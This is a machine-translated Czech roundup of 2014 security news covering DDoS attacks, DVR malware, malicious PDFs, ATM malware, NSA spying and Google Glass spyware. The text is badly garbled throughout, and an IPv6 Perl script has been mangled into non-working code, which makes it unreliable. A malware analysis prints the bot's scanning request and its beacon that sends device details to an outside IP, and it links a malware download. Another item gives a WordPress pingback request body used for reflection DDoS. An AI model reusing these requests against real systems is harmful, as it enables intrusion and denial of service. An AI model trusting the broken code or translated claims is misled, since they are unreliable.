NameCheap DNS hit server s "novým typem" DDoS
31.3.2014 Počítačový útok
Populární registrátor domén a webhostingové služby si Vaši byl potíže s nečekaným DDoS útoku zaměřeného na 300 nebo tak domén na dvou svých svých DNS nameservery.
"Samotná velikost útoku zahlceni mnoha našich DNS serverů za následek nedostupnost a pomalý výkon. Naše původní odhady ukazují, že velikost útok na více než 100Gbps, dělat to jeden z největších útoků někdo viděl, nebo se týkají. A to je Nový typ útoku, který jsme my a naše hardwarové a síťové partneři dosud nesetkal, "si Vaši generální ředitel Richard Kirkendall a Vice President Matt Russell sdílené v příspěvku . útok začal kolem 15,55 GMT / 11.55 EST ve čtvrtek, a byl plně zmírnit o tři hodiny později, ale to trvalo nějakou dobu pro všechny DNS služby společnosti vrátit zpět do normálu. "Náš DNS platforma je nadbytečný, globální platforma se šíří přes 3 kontinentech a 5 zemí, které zpracovává DNS pro mnoho našich zákazníků. To je platforma pečlivě udržovány a běžel, a platforma, která úspěšně odrazí další DDoS útoky na téměř denně, "vysvětlil dva, ale dodal, že se stále snažil udržet své služby k dispozici zákazníkům. "Trvalo nám asi 3 hodin, aby plně zmírnění útoku, úzce spolupracuje s naším hardware a sítě dodavatelů, "oni dále sdílet, a oznamuje zlepšení, aby k podobným útokům v budoucnu:" Jsme předkládání klíčovou infrastrukturu programu vylepšení DNS, který bude vidět nás masivně rozšířit Velikost naší infrastruktury DNS a naši schopnost absorbovat a odrazit útoky, jako jsou tyto. " Velikost útoku není největší, kdo někdy viděl, jako 300 gigabitů za sekundu (ve špičce) DDoS byla zaměřena proti SpamHaus v loňském roce, a teprve nedávno Cloudflare odhalil jejich infrastruktura, které byly podrobeny jednomu dosažení 400 gigabitů za sekundu. Nicméně, DDoS útoky jsou stále vážnou obtíž, zejména proto, že útočníci začali využívat zranitelné servery NTP namontovat masivní reflexe útoků. To je ještě známo, zda servery NameCheap je byly hit s tímto konkrétním typu DDoS - ". nový typ útoku" Kirkendall a Russell jen řekl, že je Vzhledem k tomu, že NTP reflexe útoky nejsou tak nové a neznámé, Zajímalo by mě, jestli byli svědky další, dosud (do značné míry), neznámý a nepoužívaný typ útoku.
Černé trhy pro hackery jsou splatné
31.3.2014 Kriminalita
Černé a šedé trhy pro počítač hackerských nástrojů, služeb a vedlejších produktů, jako jsou čísla kreditních karet ukradl i nadále rozšiřovat, vytváří rostoucí hrozbu pro podniky, vlády a jednotlivce, podle nové RAND Corporation studie . Jedním dramatickým příkladem je porušení prosince 2013 maloobchodní gigant Target, ve kterém byla data z přibližně 40 milionů kreditních karet a 70 milionů uživatelských účtů unesli. Během dnů, které údaje se objevil - k dispozici pro nákup -. Na černé webových stránkách trhu "používá Hacking být činnost, která byla prováděna především jednotlivců, kteří se sám, ale v průběhu posledních 15 let se svět hackingu se stala organizovanější a spolehlivé, "řekla Lillian Ablon, vedoucí autor studie a analytik informačních systémů v RAND, neziskové výzkumné organizace. "V některých ohledech, počítačová kriminalita může být lukrativní a jednodušší provést, než nelegálního obchodu s drogami." Růst počítačové kriminality byl nápomocen sofistikované a specializované trhy, které volně se zabývají nástroji a zkazí počítačové trestné činnosti. Jedná se o položky, jako je například využití sady (softwarových nástrojů, které vám pomohou vytvářet, distribuovat a spravovat útoky na systémy), botnety (skupina napadených počítačů dálkově řízené centrální orgán, který může být použit k odesílání nevyžádané pošty nebo povodňové webové stránky), ve znění -a-service modely (hacking k pronájmu) a ovoce o počítačové trestné činnosti, včetně čísel kreditních karet ukradl a napadených hostitelů. Ve světle několika vysoce medializovaných zatýkání a zvýšení schopnosti vymáhání práva sundat některé trhy, přístup mnoho z těchto černých trzích se stále omezenější, se zločinci prověřování potenciálních partnerů před nabídkou přístup k vyšším úrovním. To znamená, že jednou, tam je velmi nízká bariéra pro vstup na účast a zisk, podle zprávy. vědci RAND provedla více než dvě desítky rozhovorů s kybernetické bezpečnosti a souvisejících odborníků, včetně akademiků, vědců zabezpečení, novináři, výrobců a dodavatelů bezpečnostních a právních předpisů úředníci vymáhání. Studie popisuje charakteristiky počítačové kriminality černých trzích, s dodatečnou pozornost věnovaná botnetů a jejich role v černém trhu, a "zero-day" zranitelnosti (softwarové chyby, které jsou neznámé prodejců a bez softwarové záplaty). Výzkumníci také zkoumat různé projekce a prognózy na to, jak může černý trh vyvíjet. co dělá tyto černé trhy pozoruhodná je jejich odolnost a propracovanost, řekl Ablon. Dokonce i spotřebitelé a podniky opevněný své aktivity v reakci na bezpečnostní hrozby, zločinci se přizpůsobit. Zvýšení donucovacích zatčení vedlo hackerů jdou po větších cílů. Stále více a více trestných činů mají digitální komponent. K dispozici bude více aktivity v "darknets", více kontroly a prověrky účastníků, větší využití crypto-měnách, jako Bitcoin, větší možností anonymity v malware, a větší pozornost k šifrování a ochranu komunikace a transakce. Pomáhal takovými trhy, bude schopnost zaútočit pravděpodobně předstihnout schopnost bránit. Hyper-připojení vytvoří více bodů přítomnosti pro útok a využití tak, že trestná činnost stále více bude mít síťové nebo počítačové komponenty, vytváří širší škálu možností pro černý trhy. Vykořisťování sociálních sítí a mobilních zařízení bude i nadále růst. K dispozici bude více hacking-pro-pronájem, as-a-service nabídky a počítačové trestné činnosti makléře. Odborníci však nesouhlasí o tom, kdo bude nejvíce ovlivněn růstem černého trhu, jaké výrobky budou na vzestupu a které typy útoky budou častější, uvedl Ablon.
Více Device Malware: To je důvod, proč vaše DVR napadl svou stanici Synology Disk Station (a nyní s Bitcoin Miner!)
31.3.2014 Malware
Aktualizace: Jen našel to, co vypadá jako Bitcoin horník na infikované DVR. K dispozici jsou další dvě binárky. D72BNr, Bitcoin miner (dle info využití založené na řetězcích) a mzkk8g, které looksl Ike se simplar http agenta, možná stáhnout další nástroje snadno (podobně jako stočit / wget, který není nainstalován na tomto DVR ve výchozím nastavení). Přidám tyto dva soubory https://isc.sans.edu/diaryimages/hikvision.zip krátce.
Minulý týden jsme informovali, že některé skenování hostitelů na portu 5000 ar DVR (přesněji: Hikvision DVR, běžně používané pro záznam videa z kamer [1]).
Dnes jsme byli schopni obnovit malware odpovědnost. Zde si můžete stáhnout https://isc.sans.edu/diaryimages/hikvision.zip malware zde (heslo: infikované).
Malware je umístěn v / dev / cmd.so. Řada dalších podezřelých souborů, kde se nachází v adresáři / dev, které stále potřebujeme obnovit / analyzovat z testovacího systému. Compromisse DVR pravděpodobné, že se stalo přes exponované telnet portu a výchozí heslo uživatele root (12345).
Analýza malware je stále ještě probíhá, a každá pomoc je vítána (viz odkaz na malware výše). Zde jsou některé počáteční zjištění:
- Malware je ARM binární, což znamená, že je zaměřovací přístroje, není typický x86 Linux serverů.
- malware vyhledá Synology zařízení vystavené na portu 5000. Žádost http poslal malware:
GET / Webman / info.cgi? Host = HTTP/1.0
Host: [IP adresa cílového]: 5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application / x-www-form-urlencoded
Content-Length: 0
- Pak extrahuje detaily verze firmware a přenáší je na 162.219.57.8. Žádost použitý pro tento kanál hlášení:
GET / k.php? H =% lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Připojení: zavřít
Takže ve zkratce, tento malware je jen skenování pro zranitelné zařízení, a skutečné využití bude pravděpodobně přijde později.
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258
Analýza 244.703 DDoS incidentů
31.3.2014 Počítačový útok
Týmu NSFocus vydala své DDoS Threat Report 2013, který upřesňuje útoku trendy a metody v uplynulém roce. Zpráva obsahuje statistické analýzy a klíčové poznámky na základě 244.703 DDoS incidentů.
Pozorování ukazují, že DDoS útoky jsou splatné v době APT. DDoS útoky byly použity jako smokescreens k provádění APT útoků nebo pro jiné nekalým účelům. Zpráva také konstatuje, že dostupnost DDoS-as-a-Service, která poskytuje komukoli s počítačem a kreditní kartu schopnost provést útok. DDoS zesílení útoky budou i nadále představovat výzvu, jako útok března 2013 ve věci protisoutěžních jednání -spam organizace Spamhaus se ukázalo, v němž doprava dosáhla 300 Gbps. Nicméně, potenciál pro přísnější útoky DDoS amplifikace, např. takové, využívající pro NTP, mohou výrazně překročit limity šířky pásma vidět aktuální. "DDoS se rychle stává běžnou bolest bod a podniky potřebují, aby tuto hrozbu vážně, pokud by očekávali na poskytovat nepřetržitou službu svým zákazníkům, "řekl Frank Ip, viceprezident operací v USA pro Týmu NSFocus. V roce 2013, cyberattackers dal trh lekci hackernomics a představila nesčetné způsoby, v nichž se vyvinuly své strategie útoku nasadit sofistikované metody, které budou způsobit maximální množství škody pomocí nejmenším počtem zdrojů. Čím více se dozvídáme o útoku mentalitě, silnější naše obrana stane, "Ip přidal. Zjištění ukazují, že hackernomics je hnací silou, která zastřešuje DDoS trend menších, kratších a opakované útoky. Účelem většiny útoků je narušit, ne zničit. Jak takové, malé aplikační vrstvě nebo hybridní útoky, které jsou levnější, aby zahájila, může způsobit velké škody k síťovým zdrojům. attacks DNS zvýšila v důsledku pokroku v technologiích anti-DDoS, které mohou lépe NAVRCHOLU.cz TOPlist Další útoku, a DNS infrastruktura stále zůstává jedním z nejslabších článků.
Wordpress "Pingback" DDoS útoky
31.3.2014 Počítačový útok
Sucuri zjistil zajímavou "reflexní" útok pomocí funkce Wordpress Pingback zaútočit na webové stránky [1]. Na rozdíl od jiných reflexních útoky, které používají UDP služby, jako je NTP a DNS, tento útok využívá funkci Wordpress Pingback.
V úmyslu ze Pingback je upozornit na stránky, které jste odkaz na odkaz doufat, že stránky, které se spojují, aby se oplatit. Některé systémy automatizovat a spravovat automatické seznamy, které odkazují zpět na stránky, které se vztahuje jejich článek. Za účelem provádění pingback, Wordpress implementuje funkci API XML-RPC. Tato funkce bude poté odeslat požadavek na stránkách, na které byste chtěli poslat "pingback".
S Wordpress, Pingback je odeslána jako požadavek POST na požadavek / xmlrpc.php. Tělo žádosti bude vypadat takto:
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://victim</string></value></param>
<param><value><string>http://reflector</string></value></param>
</params>
</methodCall>
Pro útok viděný Sucuri, URL "oběť" zahrnoval náhodný parametr jako "victim.com? 123456 = 123456", aby se zabránilo ukládání do mezipaměti.
Výsledkem této žádosti je, že váš Wordpress instalace zašle požadavek na stránkách oběti. Nemyslím si, že útok bude poskytovat významnou dopravní zesílení, ale to poplést skutečný zdroj útoku.
Ve výchozím nastavení je tato funkce povolena ve všech Wordpress instaluje, a není zcela snadné vypnutí. Sucuri doporučuje přidat následující filtr API Wordpress:
add_filter ("xmlrpc_methods", funkce ($ metody) {
unset ($ metody ['pingback.ping']);
return $ metody;
});
Odstranění xmlrpc.php se nedoporučuje, protože to bude šroty řadu dalších funkcí, které používají rozhraní API.
[1] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
NTIA začíná přechod správy kořenové DNS
31.3.2014 IT
Americké Národní telekomunikační a informační administrace (NTIA) začala závěrečná fáze privatizace řízení Domain Name System (DNS), který pohání Internet. Tento přechod byl zahájen v roce 1997.
Z tiskové zprávy ...
" Jako první krok, NTIA se ptá na Internetové sdružení pro přidělování jmen a čísel (ICANN) o svolání globální zúčastněné strany, aby vypracovala návrh na přechod na aktuální úlohu NTIA v koordinaci systému doménových jmen na internetu je (DNS). "
NTIA, ve spojení s ICANN a Verisign, je v současné době zodpovídá za správu kořenové zóny, včetně podání souboru kořenové zóny, která obsahuje podrobnosti o domény nejvyšší úrovně (TLD). V TLD jsou poslední část Full Qualified Domain Name (FQDN), jako je například. Com,. Gov, mil., Atd.
- Rick Wanner - rwanner v ISC dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter: namedeplume (Protected)
Normalizace IPv6 adresy
31.3.2014 Bezpečnost
Jednou z nepříjemností s IPv6 adres je, že mohou být zkráceny. Přední "0" je možno vynechat, a skupiny všech ": 0000", může být nahrazena "::". Klíčem nepříjemnost je "může" slovo. Některé záznamy (např. iptables) nebude zkracovat, jiní, jako například Nginx nebo apache, bude zkracovat, což koreluje protokoly obtížněji.
V poslední době jsem začal používat malý skript v Perlu, aby "normalizovat" mé adresy IPv6 v protokolech. Skript vložte všechny chybějící "0", s. usnadňuje najít konkrétní adresu IP. Skript jsem pomocí:
#! / Usr / bin / perl
use strict;
while (<>) {
my $ řádek = $ _;
if ($ řádek = ~ / [0-9a-f:] + /) {
my $ old = $ &;
my $ new = fillv6 ($ old);
$ Řádek = ~ s / $ / starého $ new /;
}
print $ vedení;
}
sub fillv6 {
my $ v = shift;
$ V = ~ s / ^ :/ :/ 0000;
moje @ díly = split (/ :/, $ v);
my $ partn = skalární @ díly;
if ($ partn <7) {
my $ x = "0000:" x (9 - $ partn);
$ V = ~ s / :: / $ x :/;
$ V = ~ s / :: / / g;
@ Díly = split (/ :/, $ v);
}
while (my $ part = každý (@ díly)) {
$ části [$ part] = sprintf ("% 04s", $ části [$ článek]);
}
návrat join (':', @ dílů);
}
Co jsem mohl použít, je trochu rozmanitější záznamy IPv6, zda se vztahuje na všechny možné případy. Skript je právě teď v "práce pro mě" stavu, tak dejte mi vědět, jestli to funguje i pro vás.
Škodlivý PDF poslal masivní podvod na kolumbijské uživatelů tvrdí, že je z kreditní skóre agentury
31.3.2014 Viry
Máme zprávy o masivní podvod poslal do kolumbijských uživatelů tvrdí, že je z jednoho ze dvou kreditní skóre agentur v Kolumbii. Agentura se nazývá Datacredito, přidružený k Experian. Následující e-mail byl přijat:
email obdrželi
Tato e-mailová představuje jako záznam o falešně negativní zprávy o úvěrovou agenturou. Je dodáván s připojeným PDF s následujícími informacemi:
Soubor nezobrazuje nebezpečný náklad při skenování pomocí antimalware software. Nicméně, tento soubor má strukturu ve formátu PDF. Ater pomocí PDFStreamDumper pro přezkoumání, následující zajímavé informace se objevily:
PDF Stream Dumper
Tento PDF má škodlivý skriptování, který instruuje čtenáře stáhnout a spustit na adresu uvedenou v předchozím URL. Po stažení souboru zobrazené v této adresy URL, která je živá v této době, keylogger je stáhnout.
Škodlivé PDF jsou stále problémem. Pokud chcete, aby se zabránilo pádu do jedné z těchto podvodů, nezapomeňte prosím následující:
Mít poslední verzi programu Acrobat Reader nainstalovaný ve vašem počítači
Neotevírejte přílohy z neznámých zdrojů
Neumožňují skriptování v nastavení čtečky akrobat. Udržujte jej vypnout.
Jaké telefony používají světoví politici?
31.3.2014 Mobil
BlackBerry je na ústupu a Apple a Samsung se těší na nové státní zakázky.
Po léta byla jedinou uznávanou značkou telefonů, dostatečně bezpečnou pro vládu libovolné země, značka BlackBerry. Po celou tu dobu byla tato platforma považovaná za bezpečnou, i když opak mohl naznačovat například to, že čelní američtí představitelé mohli používat pouze modifikované, běžně nedostupné verze.
Dnes je již zřejmé, že zabezpečení BlackBerry bylo zlomeno a zneužito agenturou NSA, stejně jako jiné a startovací pole se tedy znovu vyrovnalo. Především výrobci Apple a Samsung se snaží posilovat své bezpečnostní řešení a mimo jiné získat oprávnění na dodávání telefonů do citlivých vládních kruhů.
V různých zemích jsou ovšem politikové různě tolerantní, paranoidní či možná tvrdohlaví a jejich požadavky na vlastní chytrý telefon se liší...
Německo
Telefon německé kancléřky Angely Merkelové se na nějakou dobu zřejmě stal nejznámějším telefonem ve světě politiky, když v říjnu minulého roku vyšlo najevo, že americká agentura NSA monitorovala její hovory. Ve skutečnosti ale mluvíme o dvou telefonech, klasická Nokia 6260 Slide, kterou NSA odposlouchávala, byla zřejmě používaná jen pro méně významné hovory. Státní záležitosti byly řešeny na telefony BlackBerry Z10, dovybaveném šifrovacím čipem společnosti Secusmart, která i nadále tvrdí, že její software je odolný proti odposlechům.
Rusko
Prezident Vladimir Putin je známý svým tvrzením, že mobilní telefon vůbec nevlastní. Ještě v roce 2006 podle vlastních slov měl řadu telefonů, ale nepoužíval je, protože preferuje jiné metody komunikace. Proti tomu předseda vlády Medvěděv miluje výrobky Apple a byl jedním z prvních vlastníků telefonu iPhone 4 (Steve Jobs mu osobně daroval jeden exemplář ještě v době, kdy nebyl v prodeji). Je nepochybné, že jedním z důvodů Putinovy averze vůči telefonům jsou jeho zkušenosti s bezpečností z dob, kdy fungoval jako agent KGB.
Francie
Francouzský prezident Francois Hollande se prakticky neoddělitelný od svého iPhonu 5. Nicméně ten by měl používat pouze pro soukromé účely. Dlouho před skandálními odhaleními Edwarda Snowdena o sledování francouzských občanů agenturou NSA byli čelní francouzští politici vybaveni bezpečnými telefony Teorem se schopností šifrování hovorů. Ale například pro Nicolase Sarkozyho byl Teorem příliš nepohodlný – mimo jiné díky tomu, že vytočení hovoru trvalo 30 sekund – že preferoval své oblíbené BlackBerry.
Severní Korea
V současnosti se odhaduje, že mobilní telefon vlastní přibližně 2 milionů Severokorejců, tedy cca 10 procent z 25milionového národa. Většina z nich je ovšem mohou použít pro vnitrostátní hovory a SMS, mobilní internet není k dispozici a mezistátní hovory jsou k dispozici pouze pro cizince. Většina modelů jsou rebrandované čínské modely, podle fotografií severokorejský vůdce používá běžný produkt tchajwanského výrobce HTC.
USA
První bitvou, kterou musel vybojovat Barack Obama po nástupu do své funkce, byl model telefonu, který by mohl používat. Podle jeho slov nesmí z bezpečnostních důvodů používat iPhone, a teprve po značném boji si mohl ponechat svůj oblíbený BlackBerry, ovšem modifikovaný model s vylepšeným šifrováním. Telefon upravovala NSA, která má s průnikem do různých značek telefonů největší zkušenosti.
Bezpilotní letoun umí ukrást data z vašeho telefonu
31.3.2014 Špionáž
Společnost SensePost představila na bezpečnostním veletrhu v Singapuru vlastního létajícího špeha.
Dron, který dostal jméno Snoopy, používá vlastní software společnosti nainstalovaný na připevněném počítači k získání přístupu do cizích mobilních zařízení a odcizení osobních dat. Majitel napadeného přístroje přitom nemá o ničem ani tušení.
Do hledáčku dronu se dostávají pouze zařízení, která právě vyhledávají bezdrátový signál. „Každé mobilní zařízení, které u sebe nosíme, vysílá jedinečný podpis – dokonce i kardiostimulátory dnes používají Wi-Fi,“ řekl Glenn Wilkinson, autor Snoopyho. Během svého letu tak může dron přijít k zajímavým informacím – kontaktům i přístupovým údajům k bankovnímu účtu.
Mnoho uživatelů chytrých telefonů nikdy nevypíná bezdrátový modul Wi-Fi. Telefon se tak neustále snaží najít nejbližší dostupnou bezdrátovou síť, do které by se mohl připojit, a to včetně v minulosti již použitých sítí. „Mnoho takových sítí používá unikátní jména a snadno lze určit jejich polohu,“ řekl Wilkinson, podle kterého Snoopy využívá kombinaci jména sítě, kterou uživatel hledá, a adresu MAC, která jednoznačně identifikuje dané zařízení, k sledování uživatelovi polohy v reálném čase.
Stejně tak by někdo mohl vytvořit síť se stejným jménem, jaké měla již v minulosti použitá síť. Do ní se následně uživatel připojí, protože k ní má důvěru. Ve skutečnosti však útočníkům dá přístup ke svým osobním datům.
Sílu svého řešení předvedli vývojáři ze SensePost na konferenci Black Hat v Singapuru. Wilkinson pouze vytáhl z batohu notebook, spustil program Snoopy a za chvíli vlastnil osobní informace stovek účastníků konference. Pomocí několika stisků kláves například zjistil, v jaké části Singapuru pravděpodobně žil jeden z účastníků sedící v pravém zadním rohu. Dokonce pak zobrazil fotografii předpokládané adresy.
Uživatelé chytrých zařízení by si při používání bezdrátových sítí měli dávat dobrý pozor. Podobný útok lze totiž provést i bez dronu. Létající zařízení pouze zvyšuje možný rozsah a účinek takového útoku. Ostatně, i sám Wilkinson přiznává, že v používaném softwaru nejde o nic nového. Nový je pouze způsob jeho využití.
Jak se tedy tomuto typu útoků bránit? Wilkinson v první řadě doporučuje vypnout bezdrátový modul a zapínat jej pouze v případě, že jej skutečně potřebujete.
Tvůrci malwaru se tentokrát zaměřili přímo na Česko
31.3.2014 Viry
Desetinu veškerých zachycených počítačových hrozeb v Česku představoval tuto středu trojský kůň VBS/CoinMiner – je zjevné, že tuzemskem prošel mohutný počítačový útok, tvrdí
Analytická síť Eset ThreatSense, která sbírá údaje o počítačových hrozbách, zjistila, že šest počítačů z tisíce se 26. 3. 2014 stalo terčem pokusu o zapojení do sítě, která se podílí na těžbě virtuální měny Bitcoin.
Na vině byl trojský kůň VBS/CoinMiner, který existuje ve dvou variantách, z nichž jedna se popsala už v prosinci 2012 a druhá v září 2013. Šíří se ve vlnách s přibližně tříměsíční periodou. A poslední vlna se zacílila především na Českou republiku a na Slovensko.
V Česku byl podíl této hrozby na všech zachycených hrozbách 9,9 procenta a na Slovensku to bylo 7,92 procenta. Zemí s třetím nejvyšším výskytem – ale ve výši pouhých 8 promile - bylo Řecko.
VBS.CoinMiner je rodina skriptů vytvořených ve Visual Basicu. Jsou to malé, nenápadné soubory (často zašifrované), které se díky tomu snadno šíří buď stahováním z webových stránek, nebo v emailech.
Nejsou to ale programy, které by dělaly samotnou těžbu bitcoinů. Trojské koně mají pouze za úkol tyto výkonné programy stahovat či updatovat a stahovat pro ně konfigurace, připravovat pro ně prostředí (například přidáním výjimky do firewallu nebo jeho vypnutím), a také je spouštět.
Eset také oznámil, že na trh uvedl novou verzi řešení Cyber Security Pro a Cyber Security, antimalware pro počítače Mac.
Mezi hlavní vylepšení patří například nový modul Anti-Phishing, který přidává novou vrstvu ochrany: hlídá, zda navštívená internetová stránka je skutečně legitimní web, nebo zda nejde o podvodnou stránku, která se snaží získat citlivé osobní údaje, jako jsou uživatelská jména a hesla nebo informace o bankovních účtech či kreditních kartách.
Inovovaný modul Social Media Scanner zase zlepšuje ochranu facebookového účtu uživatele i jeho přátel a navíc přidává vrstvu ochrany pro Twitter. Umožňuje mj. skenovat účty, a to buď automaticky, nebo na vyžádání a ukazuje i aktuální úroveň nastavení ochrany soukromí na Facebooku i Twitteru nebo doporučuje případně změnu nastavení. Novinkou je i přepracované uživatelské rozhraní.
Útočníci používají SMS k výběru z infikovaných bankomatů
31.3.2014 Mobil
Skupinka podnikavých kyberzločinců přišla na to, jak z jistého typu peněžních automatů dostat za použití textových zpráv peníze.
Nejnovější vývoj škodlivého softwaru zvaného Ploutus popsala bezpečnostní společnost Symantec, která tento malware dlouhodobě sleduje.
Malware, který se poprvé objevil v Mexiku, je navržen tak, aby dostal peníze z jistého typu samostatně stojících bankomatů. Symantec však zatím nebyl schopen tento typ bankomatů identifikovat, přestože dostal jeden z nakažených automatů k otestování.
Ploutus není zrovna jednoduché nainstalovat. Útočníci musí mít k bankomatu přímý přístup. To je pravděpodobně i důvod, proč si vybírají právě samostatně stojící bankomaty, do kterých se mohou lépe dostat.
Ranou verzi Plouta bylo možné ovládat pomocí numerického rozhraní přímo v bankomatu nebo pomocí připojené klávesnice. V poslední verzi však malware doznal značných změn a nově jej lze ovládat i na dálku přes SMS.
V této verzi útočníci otevřou bankomat a připojí k němu mobilní telefon, který následně funguje jako ovladač. Přes textové zprávy lze pak posílat příkazy k výběru hotovosti.
„Když telefon rozpozná zprávu v určitém formátu, zařízení tuto zprávu převede do síťového paketu a do infikovaného bankomatu ji předá přes USB kabel,“ napsal v blogovém příspěvku Daniel Regalado ze Symantecu.
Podle Regalada je tento nový způsob mnohem diskrétnější. Útočníci již pro výběr peněz nemusejí zadávat číselný kód na klávesnici bankomatu. U automatu tak stráví méně času, čímž se snáze vyhnout odhalení. Nyní jen do bankomatu zadají přes telefon příkaz a pro peníze někoho pošlou.
Symantec při této příležitosti rovněž připomněl, že přes 95 % bankomatů stále používá starý operační systém Windows XP, o čemž jsme vás dříve také informovali.
NSA se prolomila do serveru ve firmě Huawei
31.3.2014 Špionáž
Během víkendu byly uveřejněny zprávy tvrdící, že americká agentura NSA se dostala do serverů centrály Huawei, špehovala komunikace vedení společnosti a připravovala si půdu na infikování vybavení tohoto výrobce.
Podle informací, které během víkendu vyšly v časopisech The New York Times a Der Speigel a které jsou postaveny na dokumentech získaných Edwardem Snowdenem, NSA úspěšně pronikla do sítě v centrále Huawei Technologies v čínském městě Šen-čen.
Agentura NSA odmítla komentovat tvrzení, že systematicky napadala centrálu společnosti Huawei Technologies a monitorovala komunikaci nejvyššího vedení. V e-mailu adresovanému IDG News Service agentura tvrdí, že odmítá komentovat podobná konkrétní obvinění ze špionážních aktivit: „Aktivity agentury NSA jsou cílené pouze na podložené zahraniční špionážní cíle v reakci na požadavky v souladu svého mandátu.“
Jde o další zprávy v dlouhotrvajícím špionážním seriálu. Představitelé Spojených států po léta tvrdí, že Čínská lidová armáda spolupracuje s výrobci a kyberzločinci na špionáži proti americkým společnostem a vládním agenturám. Od loňského června ovšem dokumenty postupně uvolňované dřívějším externím spolupracovníkem NSA Edwardem Snowdenem v různých agenturních organizacích ukazují, že NSA byla zapletena do řady rozsáhlých výzvědných programů, včetně těch zacílených na čínské výrobce síťového hardwaru.
NSA se usilovně snaží distancovat od čínských aktivit a podle ní nikdy u NSA nedochází ke sběru dat, která by posloužila ke krádežím cenných informací cizích společností ve prospěch amerických.
Operace s kódovým označením Shotgiant se jednat snažila prokázat spojení mezi čínskou armádou a Huawei a současně implantovat zadní vrátka do síťového vybavení určeného na prodej zákazníkům společnosti. Citované dokumenty pocházejí z roku 2010, počátek operace se ale datuje až do roku 2006. Není jasné, jak úspěšná byla, protože technické detaily nebyly na základě žádosti americké vlády uveřejněny.
V každém případě v druhé polovině roku 2011 americké ministerstvo průmyslu zabránilo tomu, aby se produkty firmy Huawei mohly podílet na projektu budujícím národní bezdrátovou síť. Huawei také na únorové výstavě mobilní techniky oficiálně potvrdila, že se prakticky vzdala účasti na budování síťové infrastruktury USA, což je krok, který se může projevit i na poklesech prodejů jejích mobilních zařízení, jejichž je třetím největším výrobcem na světě.
Huawei situace využila k prohlášení, že se prokazuje, že nikdy dobrovolně nepředávala žádná data vládě, ať americké nebo čínské, a že by se měli výrobci spojit a řešit problematiku vlastní bezpečnosti kolektivně a mnohem intenzivněji.
Provozovatelé bankomatů přemýšlejí nad Linuxem
31.3.2014 Bezpečnost
Konec podpory operačního systému Windows XP, na kterém jsou typicky postaveny systémy bankomatů, povede k hledání alternativy, kterou můžou být i distribuce Linuxu.
Některé finanční servisní organizace přemýšlejí nad možností migrace jejích bankomatů z Windows na Linux ve snaze získat větší moc nad vlastním hardwarem a softwarovými aktualizacemi. Windows XP dnes pohání téměř 95 procent bankomatů a od 8. dubna, kdy Microsoft oficiálně ukončuje podporu tohoto systému, zůstanou bez technické podpory a podle Microsoftu musí být považovány na nechráněné.
Je pochopitelné, že Microsoft doporučuje okamžitou aktualizaci na novější verzi Windows. Řada společností již přešla či přechází na Windows 7, nejbližší alternativu, ale očekává se, že po 8. dubnu bude stále ještě více než 60 procent z celkového počtu automatů (jen v USA to znamená 400 000 kusů) na Windows XP. Rada dohlížející nad bezpečnostními standardy v platebních transakcích PCI SSC (Payment Card Industry Security Standards Council) si je situace vědoma a bude požadovat po organizacích nějakou formu kompenzačních mechanismu, díky kterému by i nadále byla garantována – když ne bezpečnost – tak alespoň naplnění požadavků norem PCI DSS.
Před systémem Windows XP se většina výrobců bankomatů spoléhala na operační systém IBM OS/2. Window XP a vestavná (embedded) verze Windows XP byly hlavním faktorem umožňujícím přítomnost Microsoftu v retailovém segmentu, kde především embedded XP byly schopny provozu na velmi nenáročném hardwaru. Pro řadu existujících modelů by tak přechod na Windows 7 vyžadoval upgrade hardwaru. Nový bankomat přitom stojí od 15 000 do 60 000 dolarů a jeho provozovatelé většinou počítají s jeho 7 až 10letou životností. Nový hardware by vedle licenčních poplatků značně prodražil migraci. A to provozovatele již čekají investice do implementace podpory pro nové standardy chytrých platebních karet EMV (Europay Mastercard Visa), navíc nedlouho po tom, co museli investovat do splnění požadavků normy ADA (Americans with Disabilities Act).
Řada z nich by preferovala scénář, kdy by si Microsoft nechal náležitě zaplatit za prodloužení podpory Windows XP, i když chápou, že pokračování investování do mrtvého OS, který již řadu let není v prodeji, akcionáře společnosti zrovna neosloví. Na druhou stranu situace nahrává právě alternativním platformám a podle některých materiálů již více než 30 procent pokladen v amerických obchodech se smíšeným zboží a benzinových pump běží na operačním systému Linux. Bankomaty by je tedy mohly následovat.
Google Glass mají velký problém s bezpečností
31.3.2014 Bezpečnost
Nedávný experiment univerzitních výzkumníků se spywarem ukázal, že Google musí před uvedením chytrých brýlí na trh ještě vydatně zapracovat na jejich zabezpečení.
Mike Lady a Kim Paterson, dva výzkumníci z kalifornské Polytechnické státní univerzity, vytvořili pravděpodobně vůbec první spyware pro chytré brýle Google Glass. Po jeho instalaci brýle každých 10 sekund pořizují fotografii a obratem ji posílají na vzdálený server.
Uživatel brýlí přitom o tom, že někdo snímá jeho okolí, nemá ani ponětí. Aplikace je totiž v provozu jen tehdy, kdy je displej brýlí vypnutý. Google sice vývojářům zakazuje vytváření aplikací, které se chovají podobným nežádoucím způsobem, v softwaru brýlí však není nic, co by jim v takovém chování mohlo zabránit.
„Pro mě osobně to bylo velké překvapení, protože Google Glass jsou venku už asi rok. Očekával bych proto, že si tohoto problému už někdo všiml a Google přišel s řešením,“ řekl Lady.
Lady a Paterson spyware zamaskovali jako poznámkovou aplikaci, kterou pojmenovali Malnotes a následně ji nahráli do obchodu Google Play. Výzkumníci tak chtěli současně otestovat, zda automatické mechanismy obchodu odhalí škodlivou aplikaci. Aplikace nahrávané do speciální obchodu MyGlass jsou zatím kontrolovány ručně – zde by pravděpodobně aplikace byla odhalena, protože neobsahuje žádnou jinou funkcionalitu než tajné pořizování fotek.
Google byl na existenci spywaru upozorněn poté, co se výzkumníci svou prací pochlubili na Twitteru. Nejprve chtěl po výzkumnících zdrojový kód a obvinil je z možného porušení vývojářských podmínek. Později však svůj postoj přehodnotil a uznal, že šlo o legitimní součást výzkumu.
Výzkumníci spyware zamaskovali jako legitimní aplikaci také proto, aby ukázali, že jen díky tomu vzroste šance, že aplikace od uživatele získá povolení k přístupu na internetu a k používání fotoaparátu.
